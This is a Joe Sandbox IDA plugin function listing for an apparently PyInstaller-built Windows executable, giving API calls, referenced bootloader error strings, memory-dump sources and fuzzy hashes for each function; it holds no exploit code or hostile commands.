Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 5b2c1e9fc095e7eb3c431b17fb97200263da2875c903d2763a27b9f49e70b7d5
Instruction ID: ea459771d120b28ccf55a19ca2f26ea919cbe2c3e5c55044ade80ddbd5e43963
Opcode Fuzzy Hash: 5b2c1e9fc095e7eb3c431b17fb97200263da2875c903d2763a27b9f49e70b7d5
Instruction Fuzzy Hash: F041A021B0865382EE20DB12EC616B9A394FF94BC4F544432ED0C97796DE7EE105AB43

Function 00007FF626641470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF626641518
malloc, xrefs: 00007FF62664151F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6266414DE
Failed to extract %s: failed to open archive file!, xrefs: 00007FF62664149F
fread, xrefs: 00007FF6266415E6
fseek, xrefs: 00007FF6266414E5
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6266415DF

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: d4058f359e5534e9154332fa8772b655c13ee2f9ca662c036acda7bf9a757419
Instruction ID: 00508e2fa628a3a4224fb5adf984a65d0b285a962d10c54d4631fa3a1e666b1c
Opcode Fuzzy Hash: d4058f359e5534e9154332fa8772b655c13ee2f9ca662c036acda7bf9a757419
Instruction Fuzzy Hash: 5241AC72A0864395EE20DB21EC511F9A390BF84784F444532ED1D97B96DE7EE542EF03

Function 00007FF62664EA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF62664EAD5

Part of subcall function 00007FF62664FA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF62664FA6F
Part of subcall function 00007FF62664FA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF62664FA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF62664EBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF62664EDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF62664EF08

Strings

csm, xrefs: 00007FF62664EBD0
csm, xrefs: 00007FF62664EAEF
csm, xrefs: 00007FF62664EB56

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 5f6e5a8d7ce8e0709680fd795fe98228c59e7ffb7f5205fd67780d0096b8d917
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: 5AD18272A087818AEF309BA5D8503AE37A0FB95788F100135EE4D97B95DF7AE440DB43

Function 00007FF626642C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF626643706,?,00007FF626643804), ref: 00007FF626642D63
MessageBoxW.USER32 ref: 00007FF626642D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF626642D70
Error, xrefs: 00007FF626642D8C
%ls: , xrefs: 00007FF626642D22
[PYI-%d:ERROR] , xrefs: 00007FF626642CA6

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 704e3d742f45a51c86662386fcc1f1352d8b00ffb4fe915c2e67ada048d927d3
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 4F31F622708A4182EA20AB21BC502BA6795BF88BC8F400136EF4DD7759DF7DD516DB02

Function 00007FF62664DD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDBD
GetLastError.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DDF5
FreeLibrary.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE63
GetProcAddress.KERNEL32(?,?,?,00007FF62664DFEA,?,?,?,00007FF62664DCDC,?,?,?,00007FF62664D8D9), ref: 00007FF62664DE6F

Strings

api-ms-, xrefs: 00007FF62664DDDD

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: dc1dd23729fa22ae003e52b2d1ea072889ce2dd6ba4bf803454c64b692098f93
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: B931D021F0A68381EE229B02AC501B8A394FF58BA4F490535EE1D873C0EF7DE4449B43

Function 00007FF626646350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Failed to load Python DLL '%ls'., xrefs: 00007FF626646497
ucrtbase.dll, xrefs: 00007FF6266463CD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF626646446
LoadLibrary, xrefs: 00007FF62664649E
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6266463F7
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6266463B7

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: b283aa1ef220967a4053d6e22b7cd11b26a61899172bbdd7b2bd60c6bb27fab1
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: 5F419E31A0CA8791EE21DB20EC642E96325FB54384F904132EA5DC3695EF7DE615DB83

Function 00007FF626642A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF62664351A,?,00000000,00007FF626643F23), ref: 00007FF626642AA0

Strings

WARNING, xrefs: 00007FF626642AAF
Warning, xrefs: 00007FF626642B1E
Warning [ANSI Fallback], xrefs: 00007FF626642B0F
[PYI-%d:%s] , xrefs: 00007FF626642AA8
0, xrefs: 00007FF626642B16

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 3707d47eab5bf1ef0d49f47ec56f42d6f9429d0dfec2962f956a368fa293a6aa
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: DC21AE32A18B8292EA209B51BC917EA6394FB887C4F400132FE8D93759DF7DD2559B42

Function 00007FF62665B1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF62665B1CF
FlsGetValue.KERNEL32 ref: 00007FF62665B1E4
FlsSetValue.KERNEL32 ref: 00007FF62665B205
FlsSetValue.KERNEL32 ref: 00007FF62665B232
FlsSetValue.KERNEL32 ref: 00007FF62665B243
FlsSetValue.KERNEL32 ref: 00007FF62665B254
SetLastError.KERNEL32 ref: 00007FF62665B26F

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction ID: 49f71f9c23f1e9b9ed64852648cddfe5d10437cfa9a45b5b27e1caaa3223b5ad
Opcode Fuzzy Hash: a5225a2428ee1ea558fded41feed7619df648b57a5ff038aad9245715dd51944
Instruction Fuzzy Hash: 23214820E0C20786FE65A7619E6313D5142BF447A0F144634E93ECAAD7DE2FA400AF43

Function 00007FF626667DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF626667E0D
GetLastError.KERNEL32 ref: 00007FF626667E19
CloseHandle.KERNEL32 ref: 00007FF626667E31
CreateFileW.KERNEL32 ref: 00007FF626667E5C
WriteConsoleW.KERNEL32 ref: 00007FF626667E7B

Strings

CONOUT$, xrefs: 00007FF626667E3D

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: 0cabc9d54a84eb1bb6e8698cd9d8ef80d2bf1fa14d70118ab14268c824f39381
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: B0116031B18A4286EB508B52FC54339A7A4FB88BE4F044234EA5DCB7A4DF7DD8549B42

Function 00007FF626648560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF626649216), ref: 00007FF626648592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266485E9

Part of subcall function 00007FF626649400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6266445E4,00000000,00007FF626641985), ref: 00007FF626649439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF626648678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF6266486F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF626649216), ref: 00007FF62664870A

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: e9fbdee87210709e9c98904fdfba6af056407c53d33398781a02956b683732ee
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: 90418322B196C281EE709F12A9606AA6394FB84BC4F440135DE4DD7B89DE7DE401DB03

Function 00007FF62665B338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B347
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B37D
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3AA
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3BB
FlsSetValue.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3CC
SetLastError.KERNEL32(?,?,?,00007FF626654F81,?,?,?,?,00007FF62665A4FA,?,?,?,?,00007FF6266571FF), ref: 00007FF62665B3E7

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction ID: 8d4df20984a9d2da6d39dd54753969e431821b778c3e6885988722b320830fc1
Opcode Fuzzy Hash: f3ef772190a77067448dcdc891e93f0fce571c39ad65bd9bbfe034f894ce387b
Instruction Fuzzy Hash: 0C116D20A0C64386FE54A3219E6313D6242BF447B0F144335E82EDA7C7DE2EA801AF43

Function 00007FF626642910 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 86COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF626641B6A), ref: 00007FF62664295E

Strings

%s: %s, xrefs: 00007FF6266429E8
Error [ANSI Fallback], xrefs: 00007FF6266429FF
[PYI-%d:ERROR] , xrefs: 00007FF626642966
Error, xrefs: 00007FF626642A0E

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
API String ID: 2050909247-2962405886
Opcode ID: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction ID: f28a71460cd9599f0d07796ee5e64200ca790fcaf93a4e55c426e5d07c38cad7
Opcode Fuzzy Hash: 9e805cce3db004805378da731f60641a61a9f8723a57293993104ba7ce00817f
Instruction Fuzzy Hash: A0313522B1868292EB20A761BC516FA6394BF887D4F400132FE8DC3749EF7DD556DB02

Function 00007FF626642390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF6266423C8
DialogBoxIndirectParamW.USER32 ref: 00007FF62664248E
DeleteObject.GDI32 ref: 00007FF6266424C1
DestroyIcon.USER32 ref: 00007FF6266424D3

Strings

Unhandled exception in script, xrefs: 00007FF6266423F8

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction ID: b87cae1656d9ddd69439b409bb070a0faf5aef8027568092723290d009f800f4
Opcode Fuzzy Hash: 39c06ba8bf9b0b274a05e8f7e17acb9149a8f0f807fdaf6a00a55f32f6777a83
Instruction Fuzzy Hash: 26315C32A19A8289EF24DB61FC552F96360FF88784F440135EA4D8BB4ADF3DD104DB02

Function 00007FF626642B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF62664918F,?,00007FF626643C55), ref: 00007FF626642BA0
MessageBoxW.USER32 ref: 00007FF626642C2A

Strings

[PYI-%d:%ls] , xrefs: 00007FF626642BA8
WARNING, xrefs: 00007FF626642BAF
Warning, xrefs: 00007FF626642C1D

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentMessageProcess
String ID: WARNING$Warning$[PYI-%d:%ls]
API String ID: 1672936522-3797743490
Opcode ID: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction ID: 6c43680de41562ca9894786e3b91a250a1d41bf50f619e9c00fe59142ee3e928
Opcode Fuzzy Hash: 9e6d9589c2ecbe46adae8e106eadd318faf54c8367477cb0129d25f7ec3a12f1
Instruction Fuzzy Hash: B521D122708B4282EB20DB14F8847AA73A4FB887C4F400132EA8D9775ADF3DD215CB42

Function 00007FF626642710 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF626641B99), ref: 00007FF626642760

Strings

ERROR, xrefs: 00007FF62664276F
Error [ANSI Fallback], xrefs: 00007FF6266427CF
Error, xrefs: 00007FF6266427DE
[PYI-%d:%s] , xrefs: 00007FF626642768

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: CurrentProcess
String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-1591803126
Opcode ID: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction ID: 415d3ceed63b74284f471c72a154b0ce66c9e97bab927fe4a514e6e95b9d6968
Opcode Fuzzy Hash: 16defea7d45dc340f891dcb1518e5bd63c50e449678e4b46de0281de23a8290b
Instruction Fuzzy Hash: DD21AE72A18B8292EB20DB50BC917EA6394FB883C4F400132FE8C97759DF7DD6559B42

Function 00007FF626659AF8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF626659B1D
GetProcAddress.KERNEL32 ref: 00007FF626659B33
FreeLibrary.KERNEL32 ref: 00007FF626659B5A

Strings

mscoree.dll, xrefs: 00007FF626659B14
CorExitProcess, xrefs: 00007FF626659B2C

Memory Dump Source

Source File: 00000004.00000002.2114714840.00007FF626641000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF626640000, based on PE: true

Associated: 00000004.00000002.2114632500.00007FF626640000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114766460.00007FF62666B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF62667E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114816914.00007FF626682000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000004.00000002.2114884582.00007FF626684000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ff626640000_Built.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 644f40749f2397ccfee8900b191f86882f652c7814ccefc594fcc00cef1e1075
Instruction ID: 605d36a21f3f64420109a094b3a562c99078770a1591395129ff42fa4cd5ada7
